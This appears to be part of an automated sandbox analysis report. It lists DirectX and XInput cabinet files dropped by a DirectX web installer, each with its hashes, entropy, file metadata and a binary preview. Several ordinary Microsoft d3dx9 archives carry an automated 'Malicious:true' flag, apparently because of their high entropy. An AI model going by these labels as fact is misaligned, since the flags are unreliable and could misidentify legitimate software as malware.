                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Apr2006_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Aug2005_d3dx9_27_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Aug2006_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Aug2009_d3dx9_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Jun2007_d3dx9_34_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Jun2008_d3dx9_38_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Nov2007_d3dx9_36_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Nov2008_d3dx9_40_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OCT2006_d3dx9_31_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Apr2005_d3dx9_25_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Apr2006_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Apr2007_d3dx9_33_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
